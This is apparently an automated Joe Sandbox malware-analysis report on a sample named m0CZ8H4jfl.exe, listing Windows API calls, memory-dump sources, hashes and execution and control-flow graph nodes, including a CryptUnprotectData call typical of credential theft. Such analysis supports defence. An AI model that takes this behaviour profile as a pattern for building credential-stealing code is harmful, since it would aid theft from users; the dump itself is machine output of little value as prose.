                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 1100898210-297319885
                                                                                                          • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                          • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                          • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                          • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\m0CZ8H4jfl.exe,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\m0CZ8H4jfl.exe,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharPrevlstrlen
                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                          • API String ID: 2709904686-2743851969
                                                                                                          • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                          • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                          • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                          • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1780285237-0
                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                          • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:11.5%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:1.1%
                                                                                                          Total number of Nodes:266
                                                                                                          Total number of Limit Nodes:22
                                                                                                          execution_graph 35925 3474d7a0 35926 3474d7bd 35925->35926 35929 3474d1ec 35926->35929 35930 3474d9e0 CryptUnprotectData 35929->35930 35931 3474d7f5 35930->35931 35932 ad030 35933 ad048 35932->35933 35934 ad0a2 35933->35934 35939 37af02b7 35933->35939 35944 37af02c8 35933->35944 35949 37af1bd0 35933->35949 35954 37af1bc0 35933->35954 35940 37af02ee 35939->35940 35942 37af1bc0 3 API calls 35940->35942 35943 37af1bd0 3 API calls 35940->35943 35941 37af030f 35941->35934 35942->35941 35943->35941 35945 37af02ee 35944->35945 35947 37af1bc0 3 API calls 35945->35947 35948 37af1bd0 3 API calls 35945->35948 35946 37af030f 35946->35934 35947->35946 35948->35946 35950 37af1bfd 35949->35950 35951 37af1c2f 35950->35951 35959 37af1d48 35950->35959 35969 37af1d58 35950->35969 35955 37af1bd0 35954->35955 35956 37af1c2f 35955->35956 35957 37af1d48 3 API calls 35955->35957 35958 37af1d58 3 API calls 35955->35958 35957->35956 35958->35956 35960 37af1d58 35959->35960 35961 37af1d6e 35959->35961 35962 37af1d98 35960->35962 35963 37af1d66 35960->35963 35961->35951 35964 37af17d0 GetCurrentThreadId 35962->35964 35963->35961 35979 37af1db1 35963->35979 35983 37af1dc0 35963->35983 35965 37af1da4 35964->35965 35965->35951 35966 37af1dac 35966->35951 35970 37af1d66 35969->35970 35971 37af1d93 35969->35971 35976 37af1d6e 35970->35976 35977 37af1db1 CallWindowProcW 35970->35977 35978 37af1dc0 CallWindowProcW 35970->35978 35971->35970 35972 37af1d98 35971->35972 35973 37af17d0 GetCurrentThreadId 35972->35973 35974 37af1da4 35973->35974 35974->35951 35975 37af1dac 35975->35951 35976->35951 35977->35975 35978->35975 35980 37af1dba 35979->35980 35982 37af1e09 35979->35982 35981 37af1e5a CallWindowProcW 35980->35981 35980->35982 35981->35982 35982->35966 35984 37af1df4 35983->35984 35985 37af1e5a CallWindowProcW 35984->35985 35986 37af1e09 35984->35986 35985->35986 35986->35966 35848 36abce60 35849 36abce7c 35848->35849 35852 36ab94b4 35849->35852 35851 36abce9b 35853 36ab94bf 35852->35853 35854 36abcf4f 35853->35854 35857 36abcf68 35853->35857 35861 36abcf59 35853->35861 35854->35851 35858 36abcf96 35857->35858 35860 36abd021 35858->35860 35865 36ab95e8 35858->35865 35862 36abcf96 35861->35862 35863 36abd021 35862->35863 35864 36ab95e8 CreateWindowExW 35862->35864 35863->35863 35864->35863 35866 36ab95f3 35865->35866 35868 36abec47 35866->35868 35869 36abe7f4 35866->35869 35868->35860 35871 36abe7ff 35869->35871 35870 36abf111 35870->35868 35871->35870 35875 36abfa68 35871->35875 35881 36abfab0 35871->35881 35886 36abfaa1 35871->35886 35876 36abfa78 35875->35876 35877 36abfaac 35875->35877 35876->35870 35878 36abfb8a 35877->35878 35891 37af00bf 35877->35891 35894 37af00c0 35877->35894 35882 36abfadb 35881->35882 35883 36abfb8a 35882->35883 35884 37af00bf CreateWindowExW 35882->35884 35885 37af00c0 CreateWindowExW 35882->35885 35884->35883 35885->35883 35887 36abfab0 35886->35887 35888 36abfb8a 35887->35888 35889 37af00bf CreateWindowExW 35887->35889 35890 37af00c0 CreateWindowExW 35887->35890 35889->35888 35890->35888 35897 37af01c8 35891->35897 35895 37af00f5 35894->35895 35896 37af01c8 CreateWindowExW 35894->35896 35895->35878 35896->35895 35898 37af01d3 CreateWindowExW 35897->35898 35899 37af0234 35898->35899 35899->35899 35987 15b168 35990 15b174 35987->35990 35991 37af2730 35990->35991 35992 37af273f 35991->35992 35997 37af0938 35992->35997 35998 37af0948 35997->35998 35999 37af0965 35998->35999 36006 37af0980 35998->36006 36018 37af0970 35998->36018 36002 37af188c 35999->36002 36004 37af1897 36002->36004 36005 37af2866 36004->36005 36038 37af1934 36004->36038 36007 37af09c6 GetCurrentProcess 36006->36007 36009 37af0a18 GetCurrentThread 36007->36009 36010 37af0a11 36007->36010 36011 37af0a4e 36009->36011 36012 37af0a55 GetCurrentProcess 36009->36012 36010->36009 36011->36012 36013 37af0a8b 36012->36013 36017 37af0ef8 36013->36017 36030 37af0b4f 36013->36030 36014 37af0ab3 GetCurrentThreadId 36015 37af0ae4 36014->36015 36015->35999 36017->36014 36019 37af09c6 GetCurrentProcess 36018->36019 36021 37af0a18 GetCurrentThread 36019->36021 36022 37af0a11 36019->36022 36023 37af0a4e 36021->36023 36024 37af0a55 GetCurrentProcess 36021->36024 36022->36021 36023->36024 36025 37af0a8b 36024->36025 36028 37af0b4f 2 API calls 36025->36028 36029 37af0ef8 36025->36029 36026 37af0ab3 GetCurrentThreadId 36027 37af0ae4 36026->36027 36027->35999 36028->36026 36029->36026 36034 37af0bc8 DuplicateHandle 36030->36034 36036 37af0bc5 DuplicateHandle 36030->36036 36031 37af0b8e 36031->36014 36035 37af0c5e 36034->36035 36035->36031 36037 37af0c5e 36036->36037 36037->36031 36040 37af193f 36038->36040 36039 37af2e79 36041 37af2ea9 36039->36041 36042 37af2ac4 11 API calls 36039->36042 36040->36039 36045 37af2ed4 36040->36045 36053 37af3e3f 36040->36053 36059 37af3e12 36040->36059 36066 37af3e40 36040->36066 36072 37af3d70 36040->36072 36079 37af3db2 36040->36079 36041->36045 36085 37af2ac4 36041->36085 36042->36041 36044 37af2ec1 36091 37afd5f8 36044->36091 36099 37afd608 36044->36099 36045->36004 36054 37af3e54 36053->36054 36055 37af3e85 36054->36055 36107 37af3fab 36054->36107 36114 37af3ff0 36054->36114 36120 37af3fe0 36054->36120 36055->36039 36060 37af3def 36059->36060 36061 37af3e1e 36059->36061 36060->36039 36061->36039 36062 37af3e85 36061->36062 36063 37af3fab 11 API calls 36061->36063 36064 37af3fe0 11 API calls 36061->36064 36065 37af3ff0 11 API calls 36061->36065 36062->36039 36063->36062 36064->36062 36065->36062 36068 37af3e54 36066->36068 36067 37af3e85 36067->36039 36068->36067 36069 37af3fab 11 API calls 36068->36069 36070 37af3fe0 11 API calls 36068->36070 36071 37af3ff0 11 API calls 36068->36071 36069->36067 36070->36067 36071->36067 36073 37af3d50 36072->36073 36075 37af3d7e 36072->36075 36073->36039 36074 37af3d80 36074->36039 36075->36039 36075->36074 36076 37af3fab 11 API calls 36075->36076 36077 37af3fe0 11 API calls 36075->36077 36078 37af3ff0 11 API calls 36075->36078 36076->36074 36077->36074 36078->36074 36081 37af3db4 36079->36081 36080 37af3dba 36080->36039 36081->36039 36081->36080 36082 37af3fab 11 API calls 36081->36082 36083 37af3fe0 11 API calls 36081->36083 36084 37af3ff0 11 API calls 36081->36084 36082->36080 36083->36080 36084->36080 36086 37af2acf 36085->36086 36087 37af0938 10 API calls 36086->36087 36090 37afd0a1 36086->36090 36088 37afd0bb 36087->36088 36166 37afc544 36088->36166 36090->36044 36094 37afd66d 36091->36094 36092 37afd6ba 36092->36045 36093 37afc5c0 LdrInitializeThunk 36093->36094 36094->36092 36094->36093 36095 37afd899 36094->36095 36097 37afdad0 WaitMessage 36094->36097 36173 37afc60c 36094->36173 36096 37af0938 10 API calls 36095->36096 36096->36092 36097->36094 36106 37afd66d 36099->36106 36100 37afc5c0 LdrInitializeThunk 36100->36106 36101 37afd899 36102 37af0938 10 API calls 36101->36102 36104 37afd6ba 36102->36104 36103 37afdad0 WaitMessage 36103->36106 36104->36045 36105 37afc60c DispatchMessageW 36105->36106 36106->36100 36106->36101 36106->36103 36106->36104 36106->36105 36108 37af3fc0 36107->36108 36109 37af3ff4 36107->36109 36108->36055 36110 37af0938 10 API calls 36109->36110 36111 37af402b 36110->36111 36112 37af4036 36111->36112 36126 37af2bec 36111->36126 36112->36055 36115 37af3ff4 36114->36115 36116 37af0938 10 API calls 36115->36116 36117 37af402b 36116->36117 36118 37af4036 36117->36118 36119 37af2bec 11 API calls 36117->36119 36118->36055 36119->36118 36121 37af3ff4 36120->36121 36122 37af0938 10 API calls 36121->36122 36123 37af402b 36122->36123 36124 37af4036 36123->36124 36125 37af2bec 11 API calls 36123->36125 36124->36055 36125->36124 36127 37af2bf7 36126->36127 36129 37af40a8 36127->36129 36130 37af2c20 36127->36130 36129->36129 36131 37af2c2b 36130->36131 36144 37af2c30 36131->36144 36134 37af4526 36135 37af40f8 CreateWindowExW 36134->36135 36136 37af4540 36135->36136 36137 37af4108 CreateWindowExW 36136->36137 36138 37af4547 36137->36138 36140 37af9067 CreateWindowExW 36138->36140 36141 37af91e0 CreateWindowExW 36138->36141 36142 37af8400 CreateWindowExW 36138->36142 36139 37af4551 36139->36129 36140->36139 36141->36139 36142->36139 36147 37af2c3b 36144->36147 36145 37af4517 36148 37af75cd 36145->36148 36146 37af3e40 11 API calls 36146->36145 36147->36145 36147->36146 36151 37af75ea 36148->36151 36149 37af7700 36150 37af76d3 36151->36149 36154 37af804f 36151->36154 36158 37af8060 36151->36158 36155 37af8060 36154->36155 36157 37af80c1 36155->36157 36162 37af4108 36155->36162 36157->36150 36159 37af807d 36158->36159 36160 37af4108 CreateWindowExW 36159->36160 36161 37af80c1 36159->36161 36160->36161 36161->36150 36163 37af4113 36162->36163 36164 37af8400 CreateWindowExW 36163->36164 36165 37af901f 36164->36165 36165->36157 36167 37afc54f 36166->36167 36169 37afd3bb 36167->36169 36170 37afc560 36167->36170 36169->36090 36171 37afd3f0 OleInitialize 36170->36171 36172 37afd454 36171->36172 36172->36169 36174 37afe708 DispatchMessageW 36173->36174 36175 37afe774 36174->36175 36175->36094 35900 37af20c0 35903 37af20ed 35900->35903 35901 37af213c 35901->35901 35903->35901 35904 37af17fc 35903->35904 35905 37af1807 35904->35905 35906 37af229c 35905->35906 35915 37af17d0 35905->35915 35910 36ab95e8 CreateWindowExW 35906->35910 35911 36abec1a 35906->35911 35908 37af22a5 35908->35901 35910->35908 35912 36abec22 35911->35912 35913 36abec47 35911->35913 35912->35913 35914 36abe7f4 CreateWindowExW 35912->35914 35913->35908 35914->35913 35916 37af17db 35915->35916 35919 37af181c 35916->35919 35918 37af22f5 35918->35906 35920 37af1827 35919->35920 35921 37af2461 GetCurrentThreadId 35920->35921 35922 37af248b 35920->35922 35921->35922 35922->35918 35923 37af2020 SetTimer 35924 37af208c 35923->35924

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 148 154328-154368 150 15436f-15444c call 153168 call 152c88 148->150 151 15436a 148->151 161 154453-154471 150->161 162 15444e 150->162 151->150 192 154474 call 154620 161->192 193 154474 call 15461d 161->193 162->161 163 15447a-154485 164 154487 163->164 165 15448c-154490 163->165 164->165 166 154495-15449c 165->166 167 154492-154493 165->167 169 1544a3-1544b1 166->169 170 15449e 166->170 168 1544b4-1544f8 167->168 174 15455e-154575 168->174 169->168 170->169 176 154577-15459c 174->176 177 1544fa-154510 174->177 183 1545b4 176->183 184 15459e-1545b3 176->184 181 154512-15451e 177->181 182 15453a 177->182 185 154520-154526 181->185 186 154528-15452e 181->186 187 154540-15455d 182->187 184->183 188 154538 185->188 186->188 187->174 188->187 192->163 193->163
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634794340.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_150000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0o)p$Lj)p$Lj)p
                                                                                                          • API String ID: 0-4075344294
                                                                                                          • Opcode ID: df2aa864ce1f4b9a7d20eb1a005d3d6a8ff61c1e6fc1c65ad84bc9ad896051ea
                                                                                                          • Instruction ID: 84951331c0300f8c8d68978bee9ca81e2c63f46c243ebb6b1c046b594190e06e
                                                                                                          • Opcode Fuzzy Hash: df2aa864ce1f4b9a7d20eb1a005d3d6a8ff61c1e6fc1c65ad84bc9ad896051ea
                                                                                                          • Instruction Fuzzy Hash: 1791C574E00218CFDB18DFA9D884A9DBBF2BF89305F148069E819AB365DB349D85CF50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 226 37afd608-37afd66b 227 37afd66d-37afd697 226->227 228 37afd69a-37afd6b8 226->228 227->228 233 37afd6ba-37afd6bc 228->233 234 37afd6c1-37afd6f8 228->234 236 37afdb7a-37afdb8f 233->236 238 37afd6fe-37afd712 234->238 239 37afdb29 234->239 240 37afd714-37afd73e 238->240 241 37afd741-37afd760 238->241 242 37afdb2e-37afdb44 239->242 240->241 248 37afd778-37afd77a 241->248 249 37afd762-37afd768 241->249 242->236 250 37afd77c-37afd794 248->250 251 37afd799-37afd7a2 248->251 253 37afd76c-37afd76e 249->253 254 37afd76a 249->254 250->242 255 37afd7aa-37afd7b1 251->255 253->248 254->248 256 37afd7bb-37afd7c2 255->256 257 37afd7b3-37afd7b9 255->257 259 37afd7cc 256->259 260 37afd7c4-37afd7ca 256->260 258 37afd7cf-37afd7ec call 37afc5c0 257->258 263 37afd7f2-37afd7f9 258->263 264 37afd941-37afd945 258->264 259->258 260->258 263->239 267 37afd7ff-37afd83c 263->267 265 37afd94b-37afd94f 264->265 266 37afdb14-37afdb27 264->266 268 37afd969-37afd972 265->268 269 37afd951-37afd964 265->269 266->242 275 37afdb0a-37afdb0e 267->275 276 37afd842-37afd847 267->276 270 37afd974-37afd99e 268->270 271 37afd9a1-37afd9a8 268->271 269->242 270->271 273 37afd9ae-37afd9b5 271->273 274 37afda47-37afda5c 271->274 280 37afd9b7-37afd9e1 273->280 281 37afd9e4-37afda06 273->281 274->275 290 37afda62-37afda64 274->290 275->255 275->266 277 37afd879-37afd88e call 37afc5e4 276->277 278 37afd849-37afd857 call 37afc5cc 276->278 288 37afd893-37afd897 277->288 278->277 291 37afd859-37afd877 call 37afc5d8 278->291 280->281 281->274 317 37afda08-37afda12 281->317 292 37afd899-37afd8ab call 37af0938 call 37afc5f0 288->292 293 37afd908-37afd915 288->293 294 37afda66-37afda9f 290->294 295 37afdab1-37afdace call 37afc5c0 290->295 291->288 321 37afd8ad-37afd8dd 292->321 322 37afd8eb-37afd903 292->322 293->275 309 37afd91b-37afd925 call 37afc600 293->309 312 37afdaa8-37afdaaf 294->312 313 37afdaa1-37afdaa7 294->313 295->275 308 37afdad0-37afdafc WaitMessage 295->308 314 37afdafe 308->314 315 37afdb03 308->315 323 37afd927-37afd92a call 37afc60c 309->323 324 37afd934-37afd93c call 37afc618 309->324 312->275 313->312 314->315 315->275 329 37afda2a-37afda45 317->329 330 37afda14-37afda1a 317->330 334 37afd8df 321->334 335 37afd8e4 321->335 322->242 336 37afd92f 323->336 324->275 329->274 329->317 332 37afda1e-37afda20 330->332 333 37afda1c 330->333 332->329 333->329 334->335 335->322 336->275
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DispatchMessage
                                                                                                          • String ID: <0r4
                                                                                                          • API String ID: 2061451462-2205127252
                                                                                                          • Opcode ID: 0f4cc9ca8728fac0f053aa9f0b20435c6550021e85f4379b14cff07a91d6b2fe
                                                                                                          • Instruction ID: 535bdbd90398ef1988af69dbbb0505c256243fae05e9e4ea7e7d997b440b9a47
                                                                                                          • Opcode Fuzzy Hash: 0f4cc9ca8728fac0f053aa9f0b20435c6550021e85f4379b14cff07a91d6b2fe
                                                                                                          • Instruction Fuzzy Hash: F4F16834A00309DFEB01DFA5CC98B9DBBF1BF88314F158168E815AF265DB76A945CB81

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 819 37afe7c8-37afe7f3 820 37afe7fa-37afe85a 819->820 821 37afe7f5 819->821 823 37afeb8d-37afebb5 820->823 824 37afe860-37afe971 820->824 821->820 827 37afebbb-37afebe8 823->827 828 37aff340-37aff368 823->828 866 37afe99b 824->866 867 37afe973-37afe97f 824->867 834 37afebee-37afedf2 827->834 835 37afeee6-37aff251 827->835 832 37aff36e-37aff545 828->832 833 37aff601 828->833 994 37aff54b call 15324d 832->994 995 37aff54b call 153168 832->995 837 37aff602-37aff609 833->837 935 37afee0b-37afee1c 834->935 936 37afedf4-37afee09 834->936 980 37aff26a-37aff27b 835->980 981 37aff253-37aff268 835->981 873 37afe9a1-37afeb43 866->873 871 37afe989-37afe98f 867->871 872 37afe981-37afe987 867->872 874 37afe999 871->874 872->874 948 37afeb45-37afeb51 873->948 949 37afeb52-37afeb53 873->949 874->873 942 37afee1d-37afeee1 935->942 936->942 937 37aff550-37aff5cf call 36abcc28 961 37aff5d4-37aff5d6 937->961 972 37aff33f 942->972 948->949 949->823 961->837 972->828 984 37aff27c-37aff33e 980->984 981->984 984->972 994->937 995->937
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2664120963.0000000037AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37AF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_37af0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: p$q
                                                                                                          • API String ID: 0-1310289903
                                                                                                          • Opcode ID: e9aee9945e9c7d55a0749c69dc3cd74012793fb22a704eb8191f454d55e29611
                                                                                                          • Instruction ID: 507419df6f1c5deab2d6d159dfb5d29d86b8272afd8960c95e77b39fb8e60c1e
                                                                                                          • Opcode Fuzzy Hash: e9aee9945e9c7d55a0749c69dc3cd74012793fb22a704eb8191f454d55e29611
                                                                                                          • Instruction Fuzzy Hash: C582C474A01228DFDB65DF65D894BA9B7B2FF89301F1081E9D80967360CB31AE82DF50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 997 36abbdf0-36abbe10 998 36abbe12 997->998 999 36abbe17-36abbe77 997->999 998->999 1001 36abc1aa-36abc1d2 999->1001 1002 36abbe7d-36abbf8e 999->1002 1005 36abc959-36abc981 1001->1005 1006 36abc1d8-36abc1ff 1001->1006 1044 36abbfb8 1002->1044 1045 36abbf90-36abbf9c 1002->1045 1012 36abcc10 1005->1012 1013 36abc987-36abcb3f 1005->1013 1010 36abc4fe-36abc86a 1006->1010 1011 36abc205-36abc40a 1006->1011 1158 36abc86c-36abc881 1010->1158 1159 36abc883-36abc894 1010->1159 1113 36abc40c-36abc421 1011->1113 1114 36abc423-36abc434 1011->1114 1015 36abcc11-36abcc17 1012->1015 1106 36abcb49-36abcb62 1013->1106 1047 36abbfbe-36abc160 1044->1047 1050 36abbf9e-36abbfa4 1045->1050 1051 36abbfa6-36abbfac 1045->1051 1126 36abc16f-36abc170 1047->1126 1127 36abc162-36abc16e 1047->1127 1052 36abbfb6 1050->1052 1051->1052 1052->1047 1173 36abcb68 call 15324d 1106->1173 1174 36abcb68 call 153168 1106->1174 1121 36abc435-36abc4f9 1113->1121 1114->1121 1116 36abcb6d-36abcbb7 1136 36abcbc2-36abcbdd call 36abcc28 1116->1136 1151 36abc958 1121->1151 1126->1001 1127->1126 1139 36abcbe3-36abcbe5 1136->1139 1139->1015 1151->1005 1162 36abc895-36abc957 1158->1162 1159->1162 1162->1151 1173->1116 1174->1116
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: p$q
                                                                                                          • API String ID: 0-1310289903
                                                                                                          • Opcode ID: 371ac15eafa6f6b52ecddb437f6b54f1e3171314b5780c8a8d9d9dba2c71220d
                                                                                                          • Instruction ID: 5d1ec25f4be4529820dba7877ca6fa1d6053bf34be26fe8da6160c9bd95f3ddc
                                                                                                          • Opcode Fuzzy Hash: 371ac15eafa6f6b52ecddb437f6b54f1e3171314b5780c8a8d9d9dba2c71220d
                                                                                                          • Instruction Fuzzy Hash: 1672C374A01218DFDB65DF65D894BA9B7B2FF89301F1081E9D80AA7360CB319E82DF54

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1281 3474d1ec-3474da52 CryptUnprotectData 1283 3474da54-3474da5a 1281->1283 1284 3474da5b-3474da83 1281->1284 1283->1284
                                                                                                          APIs
                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3474DA45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2659854188.0000000034740000.00000040.00000800.00020000.00000000.sdmp, Offset: 34740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_34740000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataUnprotect
                                                                                                          • String ID:
                                                                                                          • API String ID: 834300711-0
                                                                                                          • Opcode ID: 0eb8b4651f2dfda38ca2e38291a518150e810f18efddd70ed1cc34bbde756b73
                                                                                                          • Instruction ID: 72c94eabc0f3b84c7a416d260c0372fa019143dbbcce52e7c782c0bff1a3139a
                                                                                                          • Opcode Fuzzy Hash: 0eb8b4651f2dfda38ca2e38291a518150e810f18efddd70ed1cc34bbde756b73
                                                                                                          • Instruction Fuzzy Hash: CC115972800349DFDB10CF9AC405BEEBBF4EB48320F158419E958A7351C375A954CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2659854188.0000000034740000.00000040.00000800.00020000.00000000.sdmp, Offset: 34740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
